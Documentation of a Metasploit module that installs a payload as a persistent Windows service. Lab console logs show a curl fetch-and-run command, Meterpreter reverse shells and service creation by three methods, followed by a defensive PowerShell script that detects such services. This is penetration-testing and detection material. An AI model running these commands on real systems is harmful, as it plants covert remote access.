## Description

This module generates an executable payload, uploads it to the remote host, and installs it as a persistent Windows service. The new service is configured so that it starts the payload whenever the service runs. Administrator or SYSTEM privileges are required.

## Options

### PAYLOAD_NAME

Name of the payload file to write. Defaults to a random string.

### SERVICE_NAME

The name of the service. Defaults to a random string.

### SERVICE_DESCRIPTION

The description of the service. Defaults to a random string.

### SERVICE_DISPLAY_NAME

The display name of the service. Defaults to a random string.

### METHOD

Which method to use to create and start the service. Options are `Auto` (try all until one succeeds), `API`, `Powershell`, and `sc.exe`.

## Verification Steps

1. Get a session on the target with admin/SYSTEM privileges
2. `use exploit/windows/persistence/service`
3. `set payload `
4. `set lport `
5. `set lhost `
6. `exploit`

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

Initial shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Starting persistent handler(s)...
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49801) at 2025-11-05 16:15:06 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```

Method: `sc.exe`

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/service
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set session 1
session => 1
msf exploit(windows/persistence/service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set method sc.exe
method => sc.exe
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\nAhKD.exe
[*] Attempting sc.exe method
[*] Install service: amOovON (YmGjSOMpyNU)
[*] Service install response: [SC] CreateService SUCCESS
[*] [SC] ChangeServiceConfig2 SUCCESS
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start response:
SERVICE_NAME: YmGjSOMpyNU
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 6664
        FLAGS              :
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49831) at 2025-11-05 16:30:40 -0500
msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...
```

Method: `Powershell`

```
msf exploit(windows/persistence/service) > set method Powershell
method => Powershell
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ShNuFKol.exe
[*] Attempting Powershell method
[*] Install service: eIOICL (mpSlHnVCx)
[*] Service install response:
Status   Name               DisplayName
------   ----               -----------
Stopped  mpSlHnVCx          eIOICL
[*] Starting service
[*] Service start response:
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49833) at 2025-11-05 16:31:22 -0500
msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...
```

Method: `API`

```
msf exploit(windows/persistence/service) > set method API
method => API
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) > [*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ETuJrSPU.exe
[*] Attempting API method
[*] Install service: vElWSh (krKyTZyQvSWg)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49834) at 2025-11-05 16:31:41 -0500
```

Method: `Auto`

```
msf exploit(windows/persistence/service) > set method Auto
method => Auto
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\xuGMR.exe
[*] Attempting API method
[*] Install service: cbuEWFVI (NzbjSkwfZrk)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:49835) at 2025-11-05 16:32:06 -0500
```

Cleanup

```
msf exploit(windows/persistence/service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "stop YmGjSOMpyNU"
Process 2812 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "delete YmGjSOMpyNU"
Process 4140 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "stop mpSlHnVCx"
Process 680 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "delete mpSlHnVCx"
Process 8940 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ETuJrSPU.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "stop krKyTZyQvSWg"
Process 3660 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "delete krKyTZyQvSWg"
Process 1728 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\xuGMR.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "stop NzbjSkwfZrk"
Process 3448 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "delete NzbjSkwfZrk"
Process 9020 created.
meterpreter > exit
[*] Shutting down session: 1
```
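The scenarios above share one observable: whichever method registers the service (`sc.exe`, PowerShell or the CreateService API), the result is a Win32 service whose binary path points at a freshly written executable under the user's `AppData\Local\Temp`, and the Service Control Manager logs the installation. The following PowerShell script is an added example from the defender's side and is not part of the module or its documentation. It enumerates installed services whose image path sits in a user-writable location and cross-checks recent System log Event ID 7045 ("A service was installed in the system") records, which carry the service name, image path and installing account for any of the three methods. The list of suspicious directory roots is a heuristic assumed here, not something the page defines; `ProgramData` in particular will produce noise from legitimate vendors.

```powershell
# Added example, not part of the Metasploit module documentation.
# Hunts for services whose binary lives in a user-writable profile directory
# (the pattern this module leaves behind) and reviews SCM install events.
# Run from an elevated PowerShell prompt; Get-WinEvent on the System log
# needs administrator rights.

# Heuristic list (assumption): directories a legitimate service binary should
# rarely be launched from. Tune for your environment.
$suspiciousRoots = @(
    '\AppData\Local\Temp\',
    '\AppData\Roaming\',
    '\Users\Public\',
    '\Windows\Temp\',
    '\ProgramData\'      # noisier; some vendors legitimately install here
)

function Get-ImagePathFromCommand {
    # Extract the executable path from a service command line, which may be
    # quoted ("C:\Program Files\x\svc.exe" -arg) or bare (C:\x\svc.exe -k foo).
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    # Bare form: cut at the first whitespace that precedes a -/ style argument.
    return ($PathName -split '\s+(?=[-/])')[0].Trim()
}

function Test-SuspiciousImagePath {
    # Returns the first matching root, or $null when the path looks ordinary.
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $null }
    foreach ($root in $suspiciousRoots) {
        if ($Path -like "*$root*") { return $root }
    }
    return $null
}

# 1. Currently registered services (covers API, PowerShell and sc.exe installs).
$findings = Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc = $_
    $exe = Get-ImagePathFromCommand -PathName $svc.PathName
    $hit = Test-SuspiciousImagePath -Path $exe
    if ($hit) {
        [pscustomobject]@{
            Name        = $svc.Name
            DisplayName = $svc.DisplayName
            StartMode   = $svc.StartMode
            State       = $svc.State
            RunsAs      = $svc.StartName
            ImagePath   = $exe
            MatchedRoot = $hit
            FileExists  = Test-Path -LiteralPath $exe   # deleted binary is also a signal
        }
    }
}

if ($findings) {
    Write-Output 'Services launched from user-writable locations:'
    $findings | Format-Table -AutoSize
} else {
    Write-Output 'No registered services launched from the listed locations.'
}

# 2. Service installations recorded by the Service Control Manager in the last
#    7 days. Event ID 7045 is written at registration time, so it still shows a
#    service that was later stopped and deleted (as in the Cleanup section).
$since = (Get-Date).AddDays(-7)
$events = Get-WinEvent -FilterHashtable @{
    LogName      = 'System'
    ProviderName = 'Service Control Manager'
    Id           = 7045
    StartTime    = $since
} -ErrorAction SilentlyContinue

$events | ForEach-Object {
    $xml  = [xml]$_.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $_.TimeCreated
        ServiceName = $data['ServiceName']
        ImagePath   = $data['ImagePath']
        ServiceType = $data['ServiceType']
        StartType   = $data['StartType']
        InstalledBy = $data['AccountName']
        MatchedRoot = Test-SuspiciousImagePath -Path $data['ImagePath']
    }
} | Where-Object { $_.MatchedRoot } | Format-Table -AutoSize
```

The two checks complement each other: the first catches a service that is still registered, the second catches one that was installed and then removed, since the cleanup RC file above deletes the service but cannot remove the 7045 record from the System log. In the runs shown on this page the image path would be `C:\Users\windows\AppData\Local\Temp\<name>.exe` and the installing account the user who held the session, both of which this script surfaces.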